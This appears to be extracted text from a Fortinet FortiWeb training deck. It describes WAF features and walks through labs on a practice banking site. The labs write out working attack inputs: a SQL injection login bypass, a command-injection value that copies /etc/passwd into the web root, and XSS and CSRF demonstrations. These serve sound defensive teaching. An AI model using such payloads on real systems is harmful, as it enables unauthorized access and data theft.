FortiWeb Security Service subscription keeps yourFortiWeb automatically up to date with:
Hundreds of application signatures
Updates with new application signatures, Maliciousrobots, suspicious URL patterns and webvulnerability scanner patterns
FortiWeb Antivirus Service subscription automated
content updates for file upload scanning
Robust 24 x 7 x 365 Real-Time Global Intelligence
Real-Time Security Protection Global Distributed Network
FortiWeb Flexible Deployment Options
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
115/362
Layer II - Transparent Inspection and True
Transparent Proxy Easy deployment - No need to re-architect
network, full transparency
Fail Open Interface
Reverse Proxy Supports content modification for both
requests and replies from the server Advanced URL rewriting capabilities
HTTPS offloading
Enhanced load balancing schemes
Non Inline Deployment SPAN port Zero network latency
Blocking capabilities using TCP resets Ideal for initial product evaluations, non-
intrusive network deployment
Web Application
Servers
FortiWeb
FortiWeb
High Availability
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
116/362
Active / Passive failover Full configuration
synchronization
Seamless fail-over
No down time
Configuration Sync Sync FortiWeb devices
across networks
Allows managing policiesacross multiple devicesfrom a central location
Seamless integration intoalready existing HA/LBenvironments
Server FarFortiWeb
Disaster Recovery
FortiWeb Product Family
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
117/362
Large Enterprise Deployments ASIC based Acceleration - FortiModule-CP7 500 Mbps HTTP throughput 27,000 transactions per second
Large Enterprise/ Service Provider Deployments ASIC based Acceleration - FortiModule-CP7 1 Gbps HTTP throughput 40,000 transactions per second Hot-swap redundant AC-Power, 2*1 TB storage 6 x 10/100/1000 copper (+ 2x Gbps SFP for 3000CFsx)
Mid-Enterprise Deployments 100 Mbps HTTP throughput
10,000 transactions per secondFortiWeb-400C
FortiWeb-1000C
FortiWeb-3000C/3000CFsx
FortiWeb-4000C
Large Enterprise/ Service Provider Deployments
ASIC based Acceleration - FortiModule-CP7 Hardware based DLP acceleration 2 Gbps HTTP throughput 70,000 transactions per second Hot-swap redundant AC-Power, 2*1 TB storage 6 x 10/100/1000 copper, 2x Gbps SFP interfaces
FortiWeb-VM
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
118/362
Desktops /Private
Servers / DMZ FortiWebVirtual
Appliance
Virtualized Data Center
Public ZoneDMZ
Deploy FortiWeb in a virtualizedenvironment
Mitigates blind spots Protects web applications regardless of
connection origin
Provides visibility to internal connections as well
Same functionality as appliance
Requirement Min needed forFortiWeb-VM
Licenses 2-vCPU, 4-vCPU, 8-vCPU
Hypervisor VMware ESXi/ESX3.5/4.0/4.1/5.0
Memory Min. 1024
CPU Min. 2 virtual CPUs
10/100/1000 Interfaces Min. 2 Max. 4virtual NICs
Storage Capacity Min. 40G
Real Time Dashboard
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
119/362
FortiWeb provides a real timedashboard
Traffic monitor per application
Attack Event history per
application Latest Alerts
Appliance state
Data Analytics Geo IP Analysis & Security
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
120/362
Analyses web app usage based
on geographic location and serveraccess
Dissect traffic based on Hit, Dataand Attack type
Easily block access from a country
using right click Map view or List view
Provides a graphical interface thathelps organizations understandapplication trends both from a userand server perspective
FortiAnalyzer Integration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
121/362
Centralized logging, reportingand analysis for multipleFortiWeb devices
* Start ing From Fort iAnalyzer MR3
Acceleration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
122/362
Integrated ASIC based hardware
SSL offloading offload CPU intensiveSSL computing from server to FortiWeb Hardware-based key exchange and bulk
encryption
Purpose built SSL processing
Full certificate management
Advanced certification verification and revocationcapabilities
TCP Connection Multiplexing
FortiWeb
Data Compression
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
123/362
Compress poorly optimised contentto minimise impact on networkresources and reduce applicationdelivery latency
Allows efficient bandwidthutilization and response time tousers by compressing data
retrieved from servers Compresses files using gzip
Compression rate depends on datatype and character redundancy
FortiWeb
Load Balancing
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
124/362
Intelligent, application aware layer 7 load balancing
Support for HTTP/HTTPS only
Variety of Load Balancing algorithms Round Robin
Weighted Round Robin
Least Connection
HTTP Session Based Round Robin
Connection persistence Persistence timeout value
Flexible health checks Physical Server monitoring via HTTPS, HTTP, TCP, Ping
Content based health checks with regex support
Web Services balancing WSDL or Content routing statements
Advanced Rewriting Capabilities
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
125/362
Content Routing - route
traffic based on: IP
Host
URL
Rewriting and
Redirection capabilities Host
URL
Referrers
Rewrite reply content Absolute links
Any required content
Multiple content types
supported
Web Application Scanner
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
126/362
Easily scan yourapplications for webvulnerabilities Common vulnerabilities
SQL Injection
Cross Site Scripting
Source code disclosure OS Commanding
Enhanced/Basic Mode Authentication options Granular crawling capabilities
Schedule and on demandscanning
FortiWeb
Web Application Scanner
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
127/362
Vulnerability Reports
Scan summary Vulnerability by severity
Vulnerability by categories
Application Vulnerabilities
Common Vulnerabilities
Server Information Crawling information
URLs accepting input
External Links
Email reports automatically
Updates via FortiGuard Complements WAF for PCI DSS
6.6
FortiWeb Auto Learn
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
128/362
Understands Application Structure
Models elements from actual traffic
Builds baseline based on URLs, parameters,
HTTP methods
Automatically Understands Real behavior
Can form fields/parameters be modified by users?
What are the length and type of each form field?
What characters are acceptable (min, max, average)?
Is a form field required or optional?
Provides recommendations and graphs
What about those web app dedicated DDoS attacks?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
129/362
Application based DDoS is on the increaseaccounting for a quarter of all DDoS attacks
Under the radars bandwidth threshold
Targeting specific web app/protocol flawsrather than bandwidth consumption
CPU intensive SQL queries to backend DB
Writing to hard disks
Server specific
Slow based and legitimate request attacks
Slowloris - Sends legitimate, but partial, never ending requests
Using tools that can be easily downloaded from the internetsuch as HOIC and LOIC
Using botnets and automatic tools to reach mass
Sometimes camouflaging real data breach attempts
SQL Injection primarily Zombie BotnetMany become one
FortiWeb DoS/DDoS ProtectionApplication and Network Based
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
130/362
Analyzes requests originating from different usersbased on different characteristics such as IP and cookie
Sophisticated mechanism understands whether theseare real users or automated attacks (HOIC, LOIC tools)
Application layer 4 different policies HTTP Access Limit - Limits the amount of HTTP requests per second from a
certain IP
Malicious IPs - Limits the number of TCP connections with the same sessioncookie
HTTP Flood Prevention -Limits the number of HTTP requests per second withthe same session cookie
Real Browser Enforcement - Sets the number of HTTP requests perTCP connection, per second, to a specific URL before FortiWeb issues a script tothe client to validate whether this is a real browser or an automated tool
Network layer 2 different policies TCP Flood Prevention - Limits the number of TCP connections from the
same source IP address
SYN Cookie Protects against SYN flood attacks
Antivirus File Scanning and File UploadRestriction
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
131/362
Scan file uploads usingFortinets Antivirus engine
Regular and extended virusdatabase
Updates via FortiGuard withAntivirus service
Restricts file type uploads
Data Leak Prevention
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
132/362
FortiWeb monitors alloutgoing traffic and protectsagainst:
Information Disclosure
Credit Card theft/misuse
Web Site Anti-Defacement WAF
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
133/362
Monitors application files atspecified time intervals
Upon file change detectionFortiWeb Alert
Automatically restore
FortiWeb provides protection at all layers
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
134/362
Advanced Protection Custom Security Policies
Custom policies to match on multiple elements URL, Source IP, Header type and value, Thresholds
Antivirus file upload scanning and Data Leak Prevention Scans uploaded files for viruses and malware (FortiGuard updates)
Detects Information Disclosure, credit card and PII leakage
Auto Learn and Validation Rules Deviations from normal user behavior, automated and customer rules
Application Attack Signatures Detects known application attacks
FortiGuard updates
Protocol Validation Validates HTTP RFC compliance
Application and Network Denial of Service Protection (DoS/DDos protection)
Detects and aggregates DoS attacks from multiple vectors
Event/Attack/Traffic Alerts
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
135/362
Attack Alerts
Full HTTP request
Traffic Alerts Any access to web
applications
Event Alerts Any action on
FortiWeb device
Reports - Attacks
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
136/362
Out of the box rich andgraphical reports
Custom reports
Scheduled daily,
weekly, Monthly oron demand
PDF, HTML, Word, TXT,MHT formats
Reports Traffic and Events
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
137/362
Report on any access tothe application Application Hits
Service type
usage (HTTP/HTTPS)
Top sources
Report on any accessor change to theFortiWeb device
FortiWeb Value Add
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
138/362
FortiClient Desktop
Application Security
Application Delivery
Vulnerability Assessment
Authentication Load Balancing andAcceleration
HTTP Compliance Application Signatures Auto Learn Data Leak Prevention
Compression
Dramatically reduce the risk of corporatedata loss.
Accurate protection with multiple layers ofdefense
Integrated Web Vulnerability Scanner
Protects against the OWASP Top 10
Automated management using AutoLearn Baselining
Easily deploys in any environment Multiple deployment options
Accelerates applications Application aware Load Balancing Compression ASIC based SSL Acceleration
Helps achieve PCI compliance
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
139/362
Hands On
How to PoC FortiWeb
Web Protection Profiles
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
140/362
Web Protection Profiles
Define what to inspect and how to do it.
Are made of different rules, constraints and settings
Are similar to Protection Profiles in the FortiGate
configuration
Creating a new Web Protection Profile
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
141/362
1. Select: Web Protection ProfilesInline Protection Profile
2. Click Create New
Creating a new Web Protection Profile (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
142/362
1. Name the Web
Protection Profile:xbank_web_protection
2. Leave other fields asdefault
3. Click OK to save
4. Edit thexbank_web_policyandassign the newly created
profile5. Test accessing the
XBANK application
FortiWeb URL Rewriting
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
143/362
FortiWeb URL RewritingDiscussion
URL Rewriting
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
144/362
Without URL rewriting when accessing the XBANK application
the end user(s) are required to specify /xbank/ in the URLpath, due to the existing directory structure.
The URL Rewriting feature removes this requirement.
Added Benefit: Transparently hides the internal directory
structure from end user(s)URL entered by end user(s) changes
From:
To:
URL Rewriting > Creating Rewriting Rules
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
145/362
1. Create a New URLRewriting Rule
2. Click Create New
URL Rewriting > Creating Rewriting Rules (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
146/362
1. Unique Rule Name
2. What to rewrite
3. Where to rewrite
4. Click OK to save
5. Click Create New to define RegEx
URL Rewriting > Define Regular Expression Match
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
147/362
1. Select which object to match
2. Define the Pattern Match
3. Select conditionof the match
A Note on Regular Expressions
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
148/362
Matching URL Paths to a regex provides a concise
and flexible means for matching strings of text.
Meta-character
Description
Matches any single character
[ ] Matches a single character contained within the brackets
^ Matches the starting position within the string
$ Matches the ending position within the string
* Matches the preceding element zero or more times
? Matches the preceding element zero one time
| Choice operator matches either the expression before or the expressionafter the operator
( ) Memory. Expressions between parentheses remains in a memory position
URL Rewriting > Creating Rewriting Rules (3)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
149/362
Specify the new URL path to be used
to connect to the defined physical server
NOTE: $0 = the first RegEx parameter matched
(everything inside the first set of parenthesis)
URL Rewriting > Create a new Rewrite Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
150/362
2. Click Create New
1. Create a new URLRewriting Policy
URL Rewriting > Create a new Rewrite Policy (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
151/362
3. Unique Policy Name4. Click OK to Save
5. Click Create New to select andprioritize Rewrite Rule(s)
URL Rewriting > Set Rewrite Rule Priority
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
152/362
1. Set Rule Priority
2. Select Rewrite Rule
3. Click OK to Save
NOTES: (Least Cost Priority exec first) Priorities determine the execution order ofthe rewriting rules
Lower priority values are executed beforehigher priority values
URL Rewriting > Set Rewrite Rule Priority
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
153/362
Final Results
URL Rewriting > Associate Rewrite Policy to Protection Profile
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
154/362
2. Edit Protection Profile
3. Select rewrite policy
& Click OK to save
1. Navigate to
Web Protection Profile
URL Rewriting > Associate Protection Profile to Server Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
155/362
3. Select WebProtection Profile
1. Navigate to
Server Policy
2. Edit Server Policy
URL Rewriting Test Configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
156/362
After creating the URL Rewriting Policy, assigning it to the Web
Protection Profile xbank_web_protection and applying the WebProtection Profile to the Server Policy xbank_web_policy
Test the rewrite by entering www.xbank.com into your browser
Preventing Information Disclosure
http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
157/362
Preventing Information Disclosure
Discussion and Lab
Information Disclosure
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
158/362
1. Usually one of the first steps taken from malicious
users that will attack a system is gatheringinformation about it: Operating System, versions,application types, etc.
2. This gathering process is known as fingerprinting3. The Server Protection rule Information Disclosure
helps prevent the disclosure of this type ofinformation.
Prevent Information Disclosure
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
159/362
1. Point your browser to http://www.xbank.com/xxx.html
2. What did you get as response?. Any problem with it?
3. Sometimes applications give to much informationwhen showing an error.
Prevent Information Disclosure - Configuration
http://www.xbank.com/xxx.htmlhttp://www.xbank.com/xxx.html -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
160/362
1. Navigate toServer Protection
2. Create a New Policy
Prevent Information Disclosure Configuration (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
161/362
1. Name the Server Protection Policy: Server_Protection-xbank
2. Enable only the Information Disclosure rule
3. Select the Action of Alert & Erase4. Click OK to save
Prevent Information Disclosure Configuration (3)
Edit th b k b t ti d i th l t d l
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
162/362
Test by accessing http://www.xbank.com/xxx.html
Edit thexbank_web_potection and assign the newly created rule
1. Select New Policy
Prevent Information Disclosure Check Attack Log
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
163/362
Cross Site Scripting (XSS)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
164/362
Preventing Cross Site Scripting (XSS)Discussion and Lab
Cross Site Scripting (XSS)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
165/362
This is a type of attack on which malicious scripts are
injected into trusted sites. Most of the time the reason a site is vulnerable to this
type of attack is because they dont do appropriate
parameter validation Can be used to steal credentials, user and cookies
information
It exploits the fact that the user trusts the site
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
166/362
Cross Site Scripting (XSS) An example (index.php)
Index.php is a frameset that contains three frames:
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
167/362
- Top: topFrame.html
- Bottom: bottomFrame.html- Main: Gets the content from the p parameter value.
- By default: parameter p is feed content from login.html
Cross Site Scripting (XSS) An example (index.php)
Look what happens if you change the This is just a simple
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
168/362
You dont need toguess what happens
when a malicious siteis used instead ofwww.google.com?
Look what happens if you change the
value of parameter p to another value?
This is just a simple
example of XSS!
Prevent XSS Parameter Validation > Create Rule
http://www.google.com/http://www.google.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
169/362
1. Navigate to
Parameter Validation Rule
2. Click Create New
Prevent XSS Parameter Validation > Create Rule (2)
1 Name the Rule:
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
170/362
1. Name the Rule:index.php
2. Select Host Status
3. Select Host Name
4. Define the Request URL
5. Select the Action:Alert & Deny
6. Select the Severity:High
7. Click OK to save8. Click Create New to
define rule match criteria
Prevent XSS Parameter Validation > Create Rule (3)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
171/362
1. Parameter Name: p2. Max Length set to
default value of 0
3. Select Required
4. Select Use Type Check5. Select Argument Type
= Regular Expression
6. Regular Expression =
^login.html$7. Click OK to save
Rule match: parameter p = login.html
Prevent XSS Parameter Validation > Create Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
172/362
1. Navigate to
Parameter Validation Policy
2. Click Create New
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
173/362
Prevent XSS Parameter Validation > Apply Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
174/362
1. Apply the Parameter Validation Policy Parameter_Validation_Policy1to the Inline Protection Profile xbank_web_protection
2. Click OK to save
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
175/362
Prevent XSS Parameter Validation > Check Attack Log
Navigate to Log & Report > Log Access > Attack and search for the XSS
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
176/362
Navigate to Log & Report > Log Access > Attack and search for the XSS
Attack you just completed
Prevent SQL Injection
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
177/362
Prevent SQL Injection
Discussion
SQL (Structured Query Language) Language for
SQL Injection An overview of SQL
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
178/362
SQL (Structured Query Language). Language for
managing data in DBMS (Database ManagementSystems) Commands are grouped in four sets:
1. Data Manipulation Language (DML): SELECT, UPDATE, INSERT,DELETE
2. Data Definition Language (DDL): CREATE, ALTER, DROP3. Data Control Language (DCL): GRANT, REVOKE
4. Transaction Control Language (TCL): COMMIT, ROLLBACK
SQL Injection attackis about modifying SQL sentences by
inserting special strings in application fields, URLs, hiddenfields, etc.
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
179/362
SQL Injection An overview of SQL DML (2)
Inserting a record in a database (basic):
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
180/362
XBANK_CUSTOMER
customer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_addresscustomer_since
INSERT INTO xbank_customer (
customer_login,
customer_password,
customer_fname,
customer_lname)
VALUES (
mylogin,
abc1234,John,
Anderson)
Inserting a record in a database (basic):
INSERT INTO Table1 (
Field1,
Field2,
)
VALUES (
Value1,
Value2,
)
SQL Injection An overview of SQL DML (3)
Updating a record in a database (basic):
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
181/362
UPDATE Table1 SET
Field1 = Value1,
Field2 = Value2,
WHERE
Condition1 [and|or]
Condition2
XBANK_CUSTOMERcustomer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_addresscustomer_since
UPDATE xbank_customer SET
customer_login = mylogin,
customer_password = abc1234,
customer_fname = John,
customer_lname = AndersonWHERE
customer_id = 1
Updating a record in a database (basic):
SQL Injection An overview of SQL DML (4)
Deleting a record from the database (basic):
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
182/362
DELETE FROM Table1
WHERE
Condition1 [and|or]
Condition2
XBANK_CUSTOMERcustomer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_address
customer_since
DELETE FROM xbank_customer
WHERE
customer_email LIKE %@company.com or
customer_login = mylogin
Deleting a record from the database (basic):
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
183/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
184/362
Try to login to the application without using any valid user
SQL Injection - CHALLENGE: Login to the application
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
185/362
Try to login to the application without using any valid user
or password.TIP: Youll have to inject some SQL
By injecting some SQL you can change the conditional part of the
SQL Injection - CHALLENGE: Login to the application (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
186/362
y j g y g pquery so its always true Login: whatever you want Password: mypassword' or 'a'='a
Take a look at the query executed by the application:select
customer_id
fromxbank_customer
wherecustomer_login = whatever you want and
customer_password = mypassword or a=a ;
The part that is after the oris always true: a is always equal to a
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
187/362
Prevent SQL Injection Server Protection > Test Policy
1 Navigate to http://www xbank com/index php?p=login html and attempt a
http://www.xbank.com/index.php?p=login.htmlhttp://www.xbank.com/index.php?p=login.html -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
188/362
1. Navigate to http://www.xbank.com/index.php?p=login.html and attempt a
new SQL injection: Login with password = mypassword' or 'a'='a2. Check to see if your login attempt gets blocked
Prevent SQL Injection Server Protection > Review Log
Navigate to Log & Report > Log Access > Attack and search for the SQL
http://www.xbank.com/index.php?p=login.htmlhttp://www.xbank.com/index.php?p=login.html -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
189/362
Injection Attack you just completed
1. Instead of using Server Protection signatures, you could
Prevent SQL Injection Summary
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
190/362
stead o us g Se e otect o s g atu es, you cou d
also use parameter validation to prevent SQL Injectionlike we did in the Cross Site Scripting lab
2. To accomplish this Edit Server Protection Rule anddisable the SQL Injection signatures
3. Go to Parameter Validation
Input Rule and create anew one: Request URL: /verify_admin.php
Verify parameters txtUserand txtPassword. Enforce a maximum of 8 (eight)alphanumeric characters (use regex [A-Za-z0-9])
4. Assign the new Input Rule to the already appliedParameter Validation Rule
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
191/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
192/362
Command Injection A look to verify_admin.php
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
193/362
exec( ) function executes an operating system command.
In this case exec( ) is generating a log entries for successfuland failed logins and is using the variable $log
1. Disable Parameter Validation rules in
Command Injection Executing commands
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
194/362
xbank_web_protection
2. Since the login field value is being used by the exec( )command without validating it first, it is possible to injectsome commands there Login: myuser; cat /etc/passwd > salida.txt ; echo Password: whatever
3. Take a look at the command executed by the application:exec(echo 2011-05-21 15:20:10: User myuser; cat/etc/passwd > salida.txt ; echo logged in failed >>log/logins.txt
4. You just copied the content of/etc/passwdto a file in sitesroot directory, salida.txt
5. Go to the HTTP Server (Linux) an see if the file
Command Injection Executing commands (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
195/362
5. Go to the HTTP Server (Linux) an see if the file
/var/www/xbank/salida.txt
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
196/362
Preventing Cross Site Resource Forgery (CSRF)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
197/362
Preventing Cross Site Resource Forgery (CSRF)
Discussion
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
198/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
199/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
200/362
CSRF Attacking www.xbank.com > run attack
Search for the file csrf page.html in the resource
http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
201/362
Search for the file csrf_page.htmlin the resource
provided and double-click it
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
202/362
CSRF Attacking www.xbank.com (2)
7. let's take a look to csrf page.html
http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
203/362
_p g
Prevent CSRF Applying business logic
On way of preventing CSRF is enforcing the session
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
204/362
y p g g
to follow the application logic.
For instance; to perform a withdrawal in
www.xbank.com you should first go through
1. verify_admin.php
2. do_transaction.php
3. save_transaction.php
Page Access Rule functionality enforces businesslogic by means of a cookie, FORTIWAFSID
http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
205/362
Prevent CSRF Applying business logic (3)
1. Name Policy: page_access1
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
206/362
2. Click OK to save3. Click Create New to
create a new rule
4. Enable Host Status5. Select Host from
dropdown
6. Specify Match Type: RegEx
7. Add URL Pattern8. Click OK to Save
9. Repeat for Additional URLS
Prevent CSRF Applying business logic (3)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
207/362
Final Results of CSRF Rules Page
Prevent CSRF Applying business logic (4)
1. Editxbank web protection
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
208/362
_ _p
2. Enable Session Management
3. Select the recently created page access rule
NOTE: In order to enforce business logic, the FortiWeb
must be session aware. Thats why is mandatory to
enable session management.
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
209/362
1. Log back into www.xbank.com
Prevent CSRF Testing Configuration > Check Balance
http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
210/362
2. Stay at the account listing page and review balance
Log back into www.xbank.com
Prevent CSRF Testing Configuration > Rerun attack
http://www.xbank.com/http://www.xbank.com/ -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
211/362
Stay at the account listing page and review balance Open your browser cookie viewer and search for the
cookie FORTIWAFSID
Double click csrf_page.html
Review your balance
Prevent CSRF Testing Configuration > Verify No change
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
212/362
Any change?
Prevent CSRF Testing Configuration > Check Attack Logs
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
213/362
Brute Force Attacks
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
214/362
Brute Force AttacksDiscussion
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
215/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
216/362
What is Enable Share IP
Some source IP addresses represent 1 single computer, but other
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
217/362
source IP addresses represent 100 or 1000 computers. Caused by Source Hide NAT
Some FWB policies provide access rate limits A rate limit applied to 1 computer should be smaller than a rate limit applied to
500 computers
Thus 2 configuration values
How does FWB determine that a multiple connections originate frommore than 1 computer? Instead of only counting hits by source IP,
It counts hits by source IP + ID Field in the IP header (non-contiguous numbers)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
218/362
Configuring Brute Force Login Rule > Enable Share IP
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
219/362
1. Navigate toShare IP
2. Select Enable Share IP
3. Click Apply to save
Configuring Brute Force Login Rule > Enable Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
220/362
1. Edit Inline Protection Profilexbank_web_protection
2. Select Brute Force Login
Configuring Brute Force Login Rule (3)
Apply the Brute Force Login rule to
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
221/362
xbank_web_protection Access http://www.xbank.com/login.html
Refresh your browser as fast as you can until you getbanned for 10 seconds (F5, Command + R, etc.)
Configuring Brute Force Login Rule > Review Attack Log
http://www.xbank.com/login.htmlhttp://www.xbank.com/login.html -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
222/362
Auto-Learning
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
223/362
FortiWeb Learning Mode
Any WAF deployment requires
FortiWeb Deployment Auto-Learning
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
224/362
some knowledge of theapplication
This adds complexity to the
deployment
Auto-Learning is a mode that canhelp during the deployment
phase to create a baseline basedon the behavior
1. Go to Auto Learn Auto Learn Profile Default Auto
Configuring Auto-Learning
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
225/362
Learn Profile and create a new Inline Profile namedxbank-auto
1. Go to Server Policy Policy, editxbank_web_policyand assign
Web Protection Profile: Inline Alert Only
WAF Auto Learn Profile: xbank-autoXXXXXX
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
226/362
Configuring Auto-Learning > Create a new Profile (2)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
227/362
2. Specify Profile Settings
1. Name Profile
3. Click OK to save
Configuring Auto-Learning > Check Session Management
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
228/362
1. Go to InlineProtection Profile
2. Edit xbank_web_protection
3. Make sure Session Management is Enabled
Configuring Auto-Learning > Apply new Auto Learn Profile
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
229/362
1. Go to Server Policy
2. Edit Xbank_web_policy
3. Select Auto Learn Profile
3. Enable Monitoring Mode
1. Access the XBANK site and navigate on it. Try to access
Configuring Auto-Learning > Test WAF Auto Learn Profile
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
230/362
every page, make transfers, update profile, etc.2. Go to Auto Learn Auto Learn Report in the FortiWeb
3. Review the report automatically generated by auto-learnfeature
4. Download the Report as PDF and review it
5. Note that is possible to edit and adjust some of theresults
6. Generate Configuration based in the Auto-Learn report
Configuring Auto-Learning > Auto Learn Report
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
231/362
1. GenerateConfig
2. Name Profile
2. Click OK to save
